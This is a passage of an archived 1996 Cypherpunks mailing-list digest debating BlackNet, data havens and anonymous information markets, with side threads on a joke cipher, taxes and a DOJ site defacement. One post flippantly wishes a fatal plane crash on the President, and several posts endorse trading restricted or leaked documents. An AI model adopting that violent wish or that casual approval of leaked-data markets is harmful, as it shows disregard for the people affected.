within the jungles of Burma.

(The Israelis, for example, are insisting that all handheld units have
Explosives Escrow, for detonation with appropriate official orders.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Tue, 20 Aug 1996 00:53:12 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: US Taxes on X-Pats (getting off topic)
Message-ID: <1.5.4.32.19960819135353.009e0510@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:24 PM 8/18/96 -0400, you wrote:
>As I understand the proposal, the immigrant-benefits thing would be for 
>immigrants admitted AFTER the act was, uh, enacted. So, no ex-post-facto 
>problems.
>
>
I know this is getting way off topic...but what I am not clear about is this:

1. Americans living and working in London used to be eligible for certain
benefits from the British social security system, into which they are
required to pay. There is a reciprocal arrangement between the US and UK on
soc sec benefits and payments. The new US law seems to alter that, which
could affect the US citizen living in London, as in, "sorry mate, you can't
come in here with that knife wound, not without your cheque book you can't."

2. Making legal immigrants living in the US pay soc sec "taxes" without
being eligible for benefits sounds pretty unfair, even "unamerican."

Maybe someone who knows more about the law in these matters can clarify.

Stephen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 20 Aug 1996 03:42:22 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: [NOISE] Re: Stopped Clock. Was: Schlafly on Crypto
Message-ID: <199608191657.JAA18526@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:18 AM 8/16/96 -0700, Bill Stewart wrote:
>>>>Subject: Clinton Is Trying to be Big Brother -- Phyllis Schlafly Column

>>It does seem really odd, doesn't it?  But look at it this way:  The only 
>>reason the knuckle-dragging conservatives are able to take the moral 
>>high-ground on this and other net-freedom issues is because the OTHER 
>>"unrependant liberals" have inexplicably abandoned the correct side of the 
>>argument.  The fact that the conservatives are right may seem odd, but the 
>>behavior of the liberals is truly astonishing.
>
>Liberals?  What Liberals?  Clinton's certainly no liberal;
>he's just a big-spending statist who likes to buy votes from
>poor, middle-class, and yuppie voters rather than buying them
>from defense contractors, not that he's above that.

Well, I should have been more clear and said, "...what passes for a liberal 
these days."

In any case, my opinion is that the WRONG airplane crashed a couple of days 
ago.  <sigh!>



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anderson@optical.bms.com
Date: Tue, 20 Aug 1996 01:11:07 +0800
To: cmcurtin@research.megasoft.com
Subject: THE POUCH
In-Reply-To: <199608181757.NAA10242@goffette.research.megasoft.com>
Message-ID: <199608191407.KAA10294@zymurgy.bms.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "mattC" == C Matthew Curtin <cmcurtin@research.megasoft.com> writes:

mattC> -----BEGIN PGP SIGNED MESSAGE-----
mattC> Allow me to quote from your web page:
mattC> http://www.flagler.com/security.html

mattC> Quote #1:
mattC> "The POUCH is a secure e-mail terminal program for IBM compatible
mattC> computers. It uses a secret key phrase, advanced cryptographic
mattC> techniques and several unpublished algorithms to protect data in the
mattC> body of e-mail messages. The key phrase, which can be up to 48 bytes
mattC> long, is easily remembered and communicated. The POUCH is highly
mattC> resistant to all known forms of cryptographic attack."

mattC> Quote #2:
mattC> "We warrant that the product when delivered to you has no short cuts,
mattC> covert channels or secret solutions of any kind. No other warranty,
mattC> either expressed or implied is given."

mattC> If it is any good, there's no way for us to know. But your marketing
mattC> of the product has every indication that it's nothing more than smoke
mattC> and mirrors. To coin a phrase, "pseudocrypto."

To coin a phrase, "pseudocrapto" :-)


Jay

-- 
------------------------------------------------------
James P. Anderson III         anderson@optical.bms.com
Senior Network Engineer                          N3JMC
Bristol-Myers Squibb Pharmaceutical Research Institute
Princeton, NJ 08543               Work: (609)-252-6039





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Aug 1996 05:08:57 +0800
To: cypherpunks@toad.com
Subject: Re: Why BlackNet *IS* a Data Haven
Message-ID: <ae3debf410021004545e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:03 PM 8/19/96, Hal wrote:
>mccoy@communities.com (Jim McCoy) writes:
>>Your descriptions of BlackNet as a data haven seem to be completely
>>based upon the presumption that an anonymous contact service and contract
>>exchange is the functional equivalent to a data haven.  Here are a few
>>reasons why I would disagree:
>
>I think part of the confusion here is the name "BlackNet".  As I envision
>the concept, BlackNet is not really an anonymous contact service, or in
>fact a network of any sort.  Rather, it is a vendor.  It buys and sells
>information.  The name, while provocative, is a bit misleading in this
>regard.  (This is just my model, and may not actually correspond with
>Tim's or anyone else's idea.  But I think it more closely matches the
>data haven concept, and in fact is more consistent with the original
>announcement.)

Hal is right that BlackNet was presented as a _specific vendor_. But the
announcement also described how _anybody_ could set themselves up in the
same way, by sending out a similar announcement with their own public key.

My purpose was to:

-- demonstrate the coming future

-- use a concrete example, "BlackNet," to drive home the point (people
often pooh-pooh an abstract idea until a concrete, reified version is
produced)

-- stimulate debate about anonymous information markets

I'll comment on a few of Hal's points, but, to save space, will not comment
on most of them.


>BlackNet has a public key, and a known virtual location in the form of
>certain newsgroups that it monitors.  Anyone can initiate a
>communication interchange with BlackNet by posting a message to those
>groups, encrypted with BlackNet's key.  Presumably in that message will
>be included return address information in the form of a key and a set of
>locations that will be monitored for replies.  In this way ongoing
>conversations can be maintained between BlackNet and customers who are
>either buying or selling to it.

Exactly. And this is how it was used for several two-way communications,
back in Sept-Nov '93.

An article on the cover of "Information Week" last summer triggered new
interest, and a couple of new messages addressed to "BlackNet"--the ones I
tried to read apparently used a spoofed key, or the one Dettweiler created
and placed ahead of mine on the MIT keyserver (the shorter key that the MIT
group was able to eventually break).

>BlackNet would not be used (as I see it) for direct communication
>between buyers and sellers of information.  How would the BlackNet
>public key fit into this model?  The existence of a specific BlackNet
>public key is part of what drives me to picture it as a vendor.
>Rather, BlackNet will buy information (plus unrestricted rights to
>disseminate that information), add it to its catalog, and then
>advertise its availability and price.

It could be used for direct communications, via pools, a la the classified
ad analogy that Jim McCoy just used (and that, in fairness, I used to
describe it in a talk at Hackers several years ago).

There is "BlackNet the company" and "BlackNet the abstraction." Inasmuch as
the recipe is easy to duplicate, "BlackNet the company" would face heavy
competition.

....[stuff elided]...

>This is a little different from my picture of BlackNet, as I wrote above.
>I would see BlackNet as being a particular seller of information, who
>will respond to this message.  It could have competitors like SafeHaven,
>StrongHold, InfoBase, etc., each of which will offer data for a price,
>and each of which will have its own reputation for reliability.

Exactly.

Hal quoting Jim:

>>Now you reveal the objection I had to BlackNet being a data haven.  What if
>>only one person has a copy of this banned material?  It may not be in this
>>publishers interest to have the data available to anyone for posting in
>>response to the query ("Information does not want to be free, it wants to
...

>Here is where BlackNet as an information middleman makes the most sense.
>Its business model includes the costs of this sort of vigilance, which
>after all can be automated.

All sorts of automated vigilance can be done: scripts that scan newsgroups
and message pools, even Alta Vista-type spider searches, agents, etc.
Depending on the type of message pool, whether Usenet newsgroup, mailing
list, Web site, etc., various kinds of automation are possible. Which will
prove popular of course depends on a lot of factors.

...[more elided]...

>Actually we now have "virtual malls" online.  These are in their infancy
>but eventually they could become as easy to use and reliable as regular
>malls (for appropriate kinds of goods).  All that BlackNet (as I picture
>it) lacks is a WWW interface, and even that could be provided if the
>gateway server could be made immune to legal pressure and if various
>technicalities about anonymous WWW connections could be dealt with.

Agreed.

>As for reputations, if BlackNet is one of several vendors of
>information, like its competitors, they can all develop reputations of
>their own for reliability, honesty, availability, etc.  There may be
>problems if the testimonials of customers are all anonymous, but in
>some cases such methods as signed transcripts of information exchanges
>can be used by one side or the other to justify claims that the other
>side has cheated.

Again, agreed. Evolutionary learning will take place, reputations will be
strengthened and weakened, as always. Certainly some fraud will occur, as
in all markets.

The point being that this information market will be anarchic, in that no
government or official hierarchy will rule on legality of data. Various
access mechanisms will be tried.

The Usenet and mailing list pools are somewhat slow, but have already
worked for things like "I'd like a copy of the Church of Scientology secret
documents." (In fact, in addition to "alt.religion.scientology," for
discussions and requests, there is the newsgroup
"alt.binaries.scientology," for posting anonymized copies of restricted
documents.)

That the latency is not as low as some other markets seems to be more a
function of nascency (is this a word? it should be) than intrinsic
limitations.

---Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 20 Aug 1996 08:15:24 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: [fnord] Re: Discordians a-gogo (aggoo)
Message-ID: <2.2.32.19960819174537.00ac513c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:00 AM 8/19/96 -0400, Simon Spero wrote:
>On Mon, 19 Aug 1996, WinSock Remailer wrote:
>> 
>>           DISCORDIAN SOCIETY SUPER SECRET CRYPTOGRAPHIC CYPHER CODE
>
>BTW, have you ever looked really closely at a Terisa systems business 
>card. Really closely? HAve you seen the Fnord?

If you do not see the fnord, then it cannot eat you.

ObDiscordian: Have you noticed that there are five levels of priority in Eudora?
---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Aug 1996 06:33:33 +0800
To: cypherpunks@toad.com
Subject: Agents, Spiders, Linda, and BlackNet
Message-ID: <ae3df4cf110210046906@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Key Phrases: agents, spiders, linda, blacknet, indexing, hierarchy,
alternatives to hierarchy, emergent indexing, aptical foddering, tuple
spaces, virtual communities, shared environments

A swirl of terms, related in some interesting ways. This mini-essay is
inspired by the debate whether BlackNet is or is not a meaningful
instantiation of a data haven.

How can information be retrieved from the Net? Is organization needed? Who
does the organizing?

As the ARPANet evolved, under various names, and as UUCP and other
machine-to-machine protocols evolved, the Usenet came into being. The first
"message pool." A basic classification existed, mostly of fairly reputable
top-level topics (sci, soc, comp, etc.). Then came "alt," largely created
by our own John Gilmore. There are of course now more than 20,000
newsgroups. Searches and greps of the newsgroup list are a way to find
potentially relevant newsgroups for posting a message or finding messages
of interest.

(As is well-known, the Usenet Cabal gets its orders from the Bilderbergers
as to which newsgroups fit in with New World Order sanctioned
epistemologies.)

Some are saying there is an alternate method. With the advent of search
engines which can index messages on the Usenet (and in Webspace, but the
idea is the same), why not this alternative: put your message in a bottle
and just throw it into the "sea" of possible messages. Let search engines
find the messages of interest (modulo a day or two of latency, as the
spiders reach the space where the message was placed). No newsgroups
needed. The "keywords" list at the beginning of this message would help the
search process, though of course the body of the message should have
sufficient keywords; a formal keyword list or field serves mainly to remind
the author to add some keywords (Schelling points) that he might not have
included in his message per se.

Conversations and threads would take place in a virtual meeting place, even
more so than today. This is of course largely happening already, and even
more clearly with mailing lists which get cc:ed to other mailing lists,
e.g, the way the e-spam list forwards some of our stuff to their list and
then replies pull in the orginal author.

(The connection with "Linda" is the connection with David Gelernter's
"Linda" system, based on "tuple spaces" into which messages are placed. A
kind of sea of messages in this tuple space. The connection with the
Unabomber is left as an exercise for the reader.)

Sometimes hierarchy is useful. Library call numbers and indices make
finding books easier than searching at random; however, sufficiently fast
"library crawlers" could find even randomly-placed books. (And friends of
mine are working on small RF "localizers" which, if small enough, could be
placed on books. One could type in "Find "Robinson Crusoe," and a book
anywhere in the library could chip "Here I am." Obviously the problem is
more easily solvable for data.)

With the rise of more powerful search engines, of distributed geodesic
networks, and with the decentralization of naming power, I see Linda-type
seas of objects as more and more attractive.

This helps BlackNet-type information markets and virtual data havens.

Just some ideas. Nothing new, to me at least. But I thought some of the
newer list members might not have seen some of these ideas, part of the
assumed culture to we crypto anarchists.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike van der Merwe <mikev@is.co.za>
Date: Mon, 19 Aug 1996 19:47:53 +0800
To: WinSock Remailer <winsock@c2.org>
Subject: Re: your mail
In-Reply-To: <199608190658.XAA16050@infinity.c2.org>
Message-ID: <Pine.GSO.3.95.960819110629.27171L-100000@admin.is.co.za>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 19 Aug 1996, WinSock Remailer wrote:

> 
>           DISCORDIAN SOCIETY SUPER SECRET CRYPTOGRAPHIC CYPHER CODE
> 
> Of possible interest to all Discordians, this information is herewith 
> release
> from the vaults of A.I.S.B., under the auspices of Episkopos Dr. Mordecai
> Malignatius, KNS.
> 
> SAMPLE MESSAGE: ("HAIL ERIS")
> 
> CONVERSATION:
> A B C D E F G H I J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z
> 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
> 
> STEP 1. Write out the message (HAIL ERIS) and put all the vowels at the end
>         (HLRSAIEI)
> STEP 2. Reverse order (IEIASRLH)
> STEP 3. Convert to numbers (9-5-9-1-19-18-12-8)
> STEP 4. Put into numerical order (1-5-8-9-9-12-18-19)
> STEP 5. Convert back to letters (AEHIILRS)
> 
> This cryptographic cypher code is GUARANTEED TO BE 100% UNBREAKABLE.
> 
> 

You have GOT to be joking. This isn't happening... I can't believe I just
read this. I am at a complete loss for words...

Mike

___________________

"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 20 Aug 1996 02:31:52 +0800
To: declan@eff.org (Declan McCullagh)
Subject: Re: proxy servers in Singapore
In-Reply-To: <Pine.SUN.3.91.960819050928.6457G-100000@eff.org>
Message-ID: <199608191511.LAA08225@nrk.com>
MIME-Version: 1.0
Content-Type: text


> Yep, I have that and other Singapore stuff at:
>   http://www.eff.org/~declan/global/
> 
> -Declan

Talk about an attractive target. Just paint a BIG bullseye
on that proxy server........



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <campbell@c2.org>
Date: Tue, 20 Aug 1996 02:21:00 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: No Subject
In-Reply-To: <199608190352.XAA07594@larry.infi.net>
Message-ID: <9608191513.AA11169@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Rick Campbell <campbell@c2.org>
To: Alan Horowitz <alanh@infi.net>
CC: cypherpunks@toad.com
In-reply-to: Alan Horowitz' message of "Sun, 18 Aug 1996 23:52:05 EDT."
             <199608190352.XAA07594@larry.infi.net> 

    From: Alan Horowitz <alanh@infi.net>
    Date: Sun, 18 Aug 1996 23:52:05 -0400 (EDT)

    P.S. I have an alpha version of a program which may be of interest to
    technomads: it automatically executes scripts received by email from a
    remote machine and then mails back the results.  The scripts (shell
    scripts, perl scripts, or whatever) are encrypted and signed with PGP
    before being sent to provide security and prevent unauthorized users
    from executing scripts on your machine.  The program runs on unix
    systems, and submissions can be from anything that runs PGP and is able
    to send email.  See:

Does your mechanism do anything to prevent replay attacks?

			Rick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhiD+Bj0UvMeUesFAQF7ywP6ApwUwUWcSAs8+6HIvGkfogn69sFXJSc5
ExiktjjvzrG0903M/iihokr/xiICAAfeyylKJ4U6kbc7Ks4Tw2e0CJt5Bfrise/x
nlkcSn1+3vV7vOBfSusvVEqhIzVCdFcoi3UgavwBFp9JanldsxUhEmyuZEgc0sgU
Pg8QdEWcteo=
=ghZA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 20 Aug 1996 06:57:30 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Why TCM thinks BlackNet *IS* a Data Haven
In-Reply-To: <ae3cf6e603021004c004@[205.199.118.202]>
Message-ID: <199608191838.LAA11887@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


1st: apologies to Jim Bell for misquoting him. I think I meant
Jim Mccoy.

>Without splitting too many semantic hairs about the precise definition of
>"data haven," let me examine some ways in which BlackNet behaves
>identically to a conventional data haven.

naw, let's split some semantic hairs. <g>

I am willing to agree in principle that blacknet is *similar* to
a data haven, as I wrote in my response. 
it involves similar ideas. however, in your *original*
Blacknet announcement it was explicitly portrayed to be essentially
an *intelligence*service*.  I agree that you could have modified
this announcement to pretend that you are also providing
"data haven" type services, but you didn't focus on this angle,
and I object to you going back and claiming you had some priority on this
idea via Blacknet (at least that's what you seem to be doing)
when you really did not. of course you have been
discussing data haven ideas for about as long as anybody here, and
may even have some degree of precedence in inventing aspects of the
idea, but I don't think it's fully legitimate to suggest that
your blacknet gedanken promoted the concept of a data haven,
or even contained it.

you neglect key points that I and others are raising.
raw data is not the same as intelligence-- it is far different.
with raw data you want a mechanism that has the reliability/fidelity
and access time of a hard drive, essentially. you want something
that doesn't alter or reformulate data-- something the Blacknet announcement
never promised at all, and in fact it was clearly implying that
the service would be involved in sorting out what data to sell to
whom and presumably repackaging it, so to speak. 

sending requests
to blacknet, "can you please send me a copy of [x]" does not
fit my idea of a hard drive type request. a data haven and
a blacknet intelligence operation share some *similarities* but
in principle there would be some vastly different
implementation issues for one or the other.

again, *in*theory* you could use blacknet for a data haven type
arrangement. a company that provided both would make a lot of
sense as far as consolodating similar functions. however to
claim that you were promoting the idea of a data haven with
the initial announcement of blacknet, that's just not correct
imho. I'd call that Blacknet II: the Sequel which you recently
cooked up.

>I call this at least as functional as a "physical data haven," where
>someone might physically travel to Anguilla, say, to buy a copy of the
>Necronomicon...

again, your original blacknet service made no guarantee whatsoever about
providing data back to someone who sent it in, in unaltered form, something
that would be key to a data haven. in fact it implied that the people
who sent in the data wouldn't be interested in getting it back--they
would only want the cash for its informational value to other buyers. you do
however point out that data havens in which material sent in by some people
and retrieved by others would tend to be another application. (when I 
think of data haven I think of person [x] submitting material in secret,
and then person [x] downloading it or making it available to others
based on his own decision. blacknet was explicitly making the decision
of availability on its own)

in fact this is a very important attribute you are glossing over
with your rather slippery exposition. let's say I submit some
secret data to Blacknet, and I want a guarantee they are not going to
sell it to other people, even if it is encrypted by me.  (otherwise they
might sell it to someone who wants to break it.)  the original 
blacknet announcement involved the antithesis of this confidentiality
arrangement-- it explicitly suggested that you would use the service
only to sell data that others might want. presumably they would have
no use for an encrypted file they could not decrypt and might just
throw it away.  

again, the original announcement made *no*guarantee* that Blacknet
would even save your data. they could throw it away. that is your
idea of a data haven? if it said, "we will also guarantee we will
reliably store your data for a fee which you can retrieve"-- just
that sentence and I would agree with you that the original blacknet
was also a data haven. but lacking that, I disagree. notice that this
is quite different than the original announcement, which implied
that only the people who wanted to buy the data would submit fees
to the service, not those who submit the information (who would
in fact be paid by blacknet for the semantic content value)

>It's a data haven.

it is, after you revise it as you are doing in your recent essays.
again your original announcement did not approach the data haven
angle you are now emphasizing whatsoever and in some ways as I 
enumerate was in direct conflict with it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Aug 1996 07:07:13 +0800
To: cypherpunks@toad.com
Subject: The "Best" as the Enemy of the "Pretty Good"
Message-ID: <ae3e02ce12021004b2c4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Pretty Good Privacy, Pretty Good Remailers, Pretty Good Digital Cash,
Pretty Good Data Haven, .....

One of the main lessons of evolutioary learning theory (aka evolutionary
game theory, market learning, Darwinian selection, and related variants) is
that getting something out early is often more important than getting it
"right." Rigor is important, but, interestingly, rigor is often
best-established in an evolutionary learning environment. (We build
machines and buildings not based on first doing exhaustive analyses for
centuries, but on building actual instances and learning from
mistakes...bridges that fail, buildings that collapse, planes that crash.)

A recent example of this is the Xanadu project, whose members worked for
many years (and spent something like $7 million) to get all the long-range,
rigorous details of hypertext "right"...and were then "scooped" by Tim
Berners-Lee with his simple and straightforward HTML/URL approach. (I am
not basing this analysis on the hatchet jobs done in the press on Ted
Nelson and the other Xanafolks, but on personal contacts with many of them,
including an identical analysis from Mark Miller at an Extropaganza this
past Saturday.)

Another example is that of remailers. There is no denying that "DC-Nets"
are a more elegant approach than "mixes," but mixes (remailers) can be
easily implemented in Perl and deployed rapidly, while I know of not a
single, actual, operational DC-Net.

And of course we cannot forget Phil Zimmermann's "Pretty Good Privacy." Had
a "pretty good" version not come out, where would we be today? (And "pretty
good" does not mean PGP is weak or has been broken.)

Just a reminder that often the best is the enemy of the good.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nick West <nick@multipro.com>
Date: Tue, 20 Aug 1996 04:10:23 +0800
To: cypherpunks@toad.com
Subject: Re: Hackers invade DOJ web site
Message-ID: <199608191642.LAA07079@server.multipro.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:46 PM 8/18/96 -0700, you wrote:
>> CNN online (http://www.cnn.com) is reporting a "breakin" by "hackers"
>> to the DOJ web site.  They don't elaborate exactly how thy did it.
>
>Did anyone save a copy of the altered web page?  I would like to see
>what the crackers did.
>
>Thanks.
>
>
They showed a the page on CNN Headline News yesterday. They might show it
sometime again today, stay tuned.

Nick West
nick@multipro.com
Member of the National Wild Turkey Federation and 
The Libertarian Party of Tennessee

http://members.tripod.com/~NWest/index.html

PGP Fingerprint= F9 F7 92 D9 D3 0B 56 3E  FA 2A 78 59 27 32 7D 6F

Public key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Tue, 20 Aug 1996 07:17:19 +0800
To: cypherpunks@toad.com
Subject: Re: Why BlackNet *IS* a Data Haven
In-Reply-To: <ae3debf410021004545e@[205.199.118.202]>
Message-ID: <199608191857.LAA18109@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



tcmay@got.net (Timothy C. May) writes:
>An article on the cover of "Information Week" last summer triggered new
>interest, and a couple of new messages addressed to "BlackNet"--the ones I
>tried to read apparently used a spoofed key, or the one Dettweiler created
>and placed ahead of mine on the MIT keyserver (the shorter key that the MIT
>group was able to eventually break).

For the record, the four of us who broke the 384-bit BlackNet key weren't
from MIT:  Paul Leyland (Oxford), Arjen Lenstra (Bellcore), Alec Muffet
(Sun-UK), and Jim Gillogly (RAND).

	Jim Gillogly
	27 Wedmath S.R. 1996, 18:56




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 19 Aug 1996 20:51:50 +0800
To: cypherpunks@toad.com
Subject: Unbreakable Hoax
Message-ID: <9608190958.AA24335@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Mon Aug 19 11:55:19 1996
> 
>           DISCORDIAN SOCIETY SUPER SECRET CRYPTOGRAPHIC CYPHER CODE
> 
> Of possible interest to all Discordians, this information is herewith 
> release
> from the vaults of A.I.S.B., under the auspices of Episkopos Dr.
>  Mordecai
> Malignatius, KNS.
> 
> SAMPLE MESSAGE: ("HAIL ERIS")
> 
> CONVERSATION:
> A B C D E F G H I J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z
> 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
> 
> STEP 1. Write out the message (HAIL ERIS) and put all the vowels at the
>  end
>         (HLRSAIEI)
> STEP 2. Reverse order (IEIASRLH)
> STEP 3. Convert to numbers (9-5-9-1-19-18-12-8)
> STEP 4. Put into numerical order (1-5-8-9-9-12-18-19)
> STEP 5. Convert back to letters (AEHIILRS)
> 
> This cryptographic cypher code is GUARANTEED TO BE 100% UNBREAKABLE.

I found an optimisation to reduce computation time:
Replace steps 1 to 5 by the following step a:

STEP a. Sort the string according to the alphabet.

The properties of the algorithm are still the same, it's unbreakable 
(unfortunately also by the originator, but that's a petty detail).

;-)

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMhg6ChFhy5sz+bTpAQHlZggAwr3W4+XGpF+yqd2D/8YFbBK4v+ddjlSB
Wgjd7xU4N+KB0bRcNLMZzdiHVyeLMoi6TMmxTNarhAzqTmn5dEjhwysSkWxWsKUo
cK7T3pXO5A33r+Htv6L6W1mTlFhIW6neFM45P4NQgYdYwhPJAP8B+xMy0z0OIcoM
BHwvmaDZFJVY6ps/T23gClzKDWQI8XDFbGyL8iNNefRXKWnwLS3YZgRXGKJD9BrX
R/LtW1KzKJk63tPFWngehXItQc2WeuCdR/BhO9hCVN66j4B7t40d9e4mxCkr2f/Z
kqhaI9Cl81BA/Xj508sLADgq3NGa6ps7dIFg6Js+UD7K9NIuAfg/jg==
=qkkB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 20 Aug 1996 03:36:29 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: CS First Boston lawsuit
In-Reply-To: <ae3d43f90a021004dcf8@[205.199.118.202]>
Message-ID: <Pine.SUN.3.94.960819120150.9756A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 18 Aug 1996, Timothy C. May wrote:

> At 3:29 AM 8/19/96, Alan Horowitz wrote:
> >I suspect they are trying to get a judgement against "John Doe", in the
> >hopes of tracking him down later.
> >
> >Actually, if I had a sizeable judgement against such a John Doe, I could
> >probably find a private detective who would find the dude for a
> >contingent fee. Wow, a whole new class of factoring (commerce definition)
> >opens up. Get me a lawyer....
> 
> Lawyers out there can and should correct me if I'm wrong, but I don't
> believe either the criminal or civil justice system has the concept of a
> "John Doe" trial! The ability to have the advice of an attorney, to
> confront one's accusers, cross-examine witnesses, and mount a defense, and
> all that constitutional stuff. Rather hard to do if the trial is in the
> past tense.
> 
> Can you cite an example of such a "John Doe" trial in the U.S.?

Not exactly, but judgements against John Doe's or even "$956,334.34" are
common.  Typically they are default judgements where a property seizure is
involved.

"The United States of America v. $534,444.00" and "The United States of
AMerica v. One Red Porsche" is a common theme.

> 
> (There may be trials "in absentia," more so in other countries than in the
> U.S., but not when no persons have been identified at all!)
> 
> 
> --Tim May, who hopes he is never identified as the "John Doe" indicted,
> tried, convicted, and sentenced in 1979 in Washington County, Oregon, for
> the crime of unlawful foddering in a public place.
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 20 Aug 1996 07:37:41 +0800
To: cypherpunks@toad.com
Subject: Naked woman decapitates man on Internet!!!
Message-ID: <Pine.GUL.3.95.960819122021.1842D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


You just gotta love the headline. Anyone have the URL?

Seen on Newspage headlines; I assume the full text is on ClariNet.        

